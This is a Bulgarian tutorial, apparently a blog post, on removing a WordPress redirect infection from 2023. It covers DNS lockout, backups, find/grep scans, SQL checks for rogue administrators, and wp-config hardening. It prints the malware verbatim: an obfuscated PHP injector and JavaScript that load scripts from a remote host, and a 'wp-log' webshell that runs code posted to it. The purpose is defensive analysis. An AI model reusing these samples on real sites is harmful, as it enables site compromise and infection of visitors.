Fix Redirect WordPress Hack 2023 (вирус за пренасочване)

WordPress определено е най-използваната платформа CMS (Content Management System) както за блогове, така и за стартови онлайн магазини (с модула WooCommerce), което го прави най-податливия на компютърни атаки (хакерство). Една от най-използваните хакерски операции има за цел да пренасочи компрометирания уебсайт към други уеб страници. Redirect WordPress Hack 2023 е сравнително нов злонамерен софтуер, който пренасочва целия сайт към уеб страници със спам или който на свой ред може да зарази компютрите на потребителите.

Ако вашият сайт е разработен на WordPress е пренасочен към друг сайт, тогава най-вероятно е жертва на вече известния хак за пренасочване.

В този урок ще намерите необходимата информация и полезни съвети, чрез които можете да девирусирате уебсайт, заразен с пренасочване WordPress Hack (Virus Redirect). Чрез коментарите можете да получите допълнителна информация или да поискате помощ.

Откриване на вируса, който пренасочва сайтовете WordPress

Внезапно и неоправдано намаляване на трафика на сайта, намаляване на броя на поръчките (в случай на онлайн магазини) или на приходите от реклама са първите признаци, че нещо не е наред. Откриване "Redirect WordPress Hack 2023” (Пренасочване на вируси) може да се извърши и „визуално”, когато отворите уебсайта и сте пренасочени към друга уеб страница.

От опит повечето зловреден софтуер в мрежата са съвместими с интернет браузъри: Chrome, Firefox, Edge, Opera. Ако сте компютърен потребител Mac, тези вируси всъщност не се виждат в браузъра Safari. Система за сигурност от Safari тихо блокира тези злонамерени скриптове.

Какво да направите, ако имате уебсайт, заразен с Redirect WordPress Hack

Надявам се, че първата стъпка не е да се паникьосвате или да изтриете уебсайта. Дори заразени или вирусни файлове не трябва да се изтриват първо. Те съдържат ценна информация, която може да ви помогне да разберете къде е пробивът в сигурността и какво е засегнало вируса. Начин на действие.

Затворете уебсайта за обществеността.

Как затваряте вирусен уебсайт за посетители? Най-простият е да използвате DNS мениджъра и да изтриете IP за "A" (името на домейн) или да дефинирате несъществуващ IP. По този начин посетителите на уебсайта ще бъдат защитени от това redirect WordPress hack което може да ги отведе до уеб страници с вируси или СПАМ.

Ако използвате CloudFlare като DNS мениджър влизате в акаунта и изтривате DNS записите "A” за името на домейна. По този начин засегнатият от вируса домейн ще остане без IP, като вече няма да може да бъде достъпен от интернет.

Копирате IP-то на уебсайта и го „насочвате“, така че само вие да имате достъп до него. От вашия компютър.

Как да промените истинския IP на уебсайт на компютри Windows?

Методът често се използва за блокиране на достъпа до определени уебсайтове чрез редактиране на файла "hosts".

1. Отваряте Notepad или друг текстов редактор (с права administrator) и редактирайте файла "hosts". Намира се в:

C:\Windows\System32\drivers\etc\hosts

2. Във файла "hosts" добавете "route" към реалния IP на вашия уебсайт. IP изтрит по-горе от DNS мениджъра.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Запазете файла и отворете уебсайта в браузъра.

Ако уебсайтът не се отваря и не сте направили нищо нередно във файла "hosts", това най-вероятно е DNS кеш.

За да изчистите DNS кеша на операционна система Windows, отворено Command Prompt, където изпълнявате командата:

ipconfig /flushdns

Как да промените истинския IP на уебсайт на компютри Mac / MacКнига?

За компютърни потребители Mac малко по-лесно е да промените реалния IP на уебсайт.

1. Отворете помощната програма Terminal.

2. Стартирайте командния ред (изисква системна парола за изпълнение):

sudo nano /etc/hosts

3. Същото като при компютрите Windows, добавете реалния IP на домейна.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Запазете промените. Ctrl+X (y).

След като сте „маршрутизирали“, вие сте единственият човек, с който можете да получите достъп до заразения уебсайт Redirect WordPress Hack.

Пълно архивиране на уебсайтове – файлове и база данни

Дори и да е заразен с „redirect WordPress hack”, препоръката е да направите генерален бекъп на целия уебсайт. Файлове и база данни. Възможно е също така да запазите локално копие на двата файла от public / public_html както и базата данни.

Идентифициране на заразени файлове и такива, модифицирани от Redirect WordPress Hack 2023

Основните целеви файлове на WordPress има index.php (в корена), header.php, index.php şi footer.php на темата WordPress активи. Проверете ръчно тези файлове и идентифицирайте зловреден код или скрипт за зловреден софтуер.

През 2023 г. вирус на „Redirect WordPress Hack” вмъкнете index.php код от формата:

(Не препоръчвам да изпълнявате тези кодове!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Декодирано, това зловреден скрипт това е основно следствие от заразяването на уебсайта WordPress. Не скриптът стои зад зловреден софтуер, а скриптът, който прави възможно пренасочването на заразената уеб страница. Ако декодираме скрипта по-горе, получаваме:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

За да идентифицирате всички файлове на сървъра, които съдържат този код, е добре да имате достъп SSH към сървъра, за да стартирате командните редове за проверка и управление на файлове Linux.

Свързани: Как да разберете дали вашият блог е заразен или не, с помощ Google Search , (WordPress Вирус)

По-долу има две команди, които определено са полезни за идентифициране на наскоро модифицирани файлове и файлове, които съдържат определен код (низ).

Как виждате на Linux PHP файловете са променени през последните 24 часа или друга времева рамка?

Поръчка "find” е много лесен за използване и позволява персонализиране за задаване на периода от време, пътя за търсене и типа на файловете.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

В изхода ще получите информация за датата и часа на промяна на файла, разрешенията за запис / четене / изпълнение (chmod) и към коя група/потребител принадлежи.

Ако искате да проверите преди повече дни, променете стойността "-mtime -1” или използвайте „-mmin -360” за минути (6 часа).

Как да търсите код (низ) в PHP, Java файлове?

Командният ред "find", който ви позволява бързо да намерите всички PHP или Java файлове, които съдържат определен код, е както следва:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Командата ще търси и показва файловете .php şi .js съдържащ "uJjBRODYsU".

С помощта на горните две команди много лесно ще разберете кои файлове са били модифицирани наскоро и кои съдържат зловреден код.

Премахва зловреден код от модифицирани файлове, без да компрометира правилния код. В моя сценарий зловредният софтуер е поставен преди отваряне <head>.

При изпълнение на първата команда "find" е много възможно да откриете нови файлове на сървъра, които не са ваши WordPress нито поставени там от вас. Файлове, принадлежащи към тип вирус Redirect WordPress Hack.

В сценария, който разследвах, файлове от формата „wp-log-nOXdgD.php". Това са файлове за "хвърляне на хайвера", които също съдържат зловреден код, използван от вируса за пренасочване.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Целта на файловете от тип "wp-log-*” е да разпространи пренасочващия хак вирус към други уебсайтове, хоствани на сървъра. Това е злонамерен софтуерен код от типа „webshell”, съставен от а основен раздел (в който са дефинирани някои криптирани променливи) и o секция за изпълнение чрез който нападателят се опитва да зареди и изпълни злонамерен код в системата.

Ако има променлива POST на име 'bh' и неговата шифрована стойност MD5 е равно на "8f1f964a4b4d8d1ac3f0386693d28d03“, тогава се появява скриптът, за да напише шифрованото съдържание base64 на друга променлива, наречена "b3' във временен файл и след това се опитва да включи този временен файл.

Ако има променлива POST или GET на име 'tick', скриптът ще отговори със стойността MD5 на низа "885".

За да идентифицирате всички файлове на сървъра, които съдържат този код, изберете низ, който е общ, след което изпълнете командата „find” (подобно на горното). Изтрийте всички файлове, съдържащи този зловреден код.

Пропуск в сигурността, използван от Redirect WordPress Hack

Най-вероятно този вирус за пренасочване пристига чрез експлоатация на административния потребител WordPress или чрез идентифициране на a уязвим плъгин което позволява добавяне на потребители с привилегии на administrator.

За повечето уебсайтове, създадени на платформата WordPress възможно е редактиране на файлове с тема или плъгинот административния интерфейс (Dashboard). По този начин злонамерен човек може да добави злонамерен код към файловете на темата, за да генерира скриптовете, показани по-горе.

Пример за такъв злонамерен код е следният:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript посочени в заглавката на темата WordPress, веднага след отваряне на етикета <head>.

Доста е трудно да се дешифрира този JavaScript, но е очевидно, че той отправя запитвания към друг уеб адрес, откъдето най-вероятно извлича други скриптове, за да създаде файловете "wp-log-*”, за което говорих по-горе.

Намерете и изтрийте този код от всички файлове PHP засегнати.

Доколкото разбрах, този код беше добавени ръчно от нов потребител с администраторски права.

Така че, за да предотвратите добавянето на зловреден софтуер от таблото за управление, най-добре е да деактивирате опцията за редактиране WordPress Теми / добавки от таблото за управление.

Редактирайте файла wp-config.php и добавете редовете:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

След извършване на тази промяна, няма потребител WordPress вече няма да можете да редактирате файлове от таблото за управление.

Проверете потребителите с роля на Administrator

По-долу е дадена SQL заявка, която можете да използвате за търсене на потребители с ролята на administrator в платформата WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Тази заявка ще върне всички потребители в таблицата wp_users който възложи ролята на administrator. Заявката се прави и за таблицата wp_usermeta за търсене в мета'wp_capabilities', който съдържа информация за потребителските роли.

Друг метод е да ги идентифицирате от: Dashboard → Users → All Users → Administrator. Съществуват обаче практики, чрез които даден потребител може да бъде скрит в панела на таблото. И така, най-добрият начин да видите потребителите "Administrator"В WordPress е горната SQL команда.

В моя случай идентифицирах в базата данни потребителя с името "wp-import-user". Доста внушително.

Също така от тук можете да видите датата и часа на потребителя WordPress беше създаден. Идентификационният номер на потребителя също е много важен, защото търси в регистрационните файлове на сървъра. По този начин можете да видите цялата активност на този потребител.

Изтриване на потребители с роля на administrator което не познавате тогава смяна на пароли за всички административни потребители. Редактор, Автор, Administrator.

Променете паролата на потребителя на SQL базата данни на засегнатия уебсайт.

След като предприемете тези стъпки, уебсайтът може да бъде рестартиран за всички потребители.

Имайте предвид обаче, че това, което представих по-горе, е един от може би хилядите сценарии, при които даден уебсайт е заразен с Redirect WordPress Hack през 2023г.

Ако уебсайтът ви е бил заразен и имате нужда от помощ или ако имате въпроси, разделът за коментари е отворен.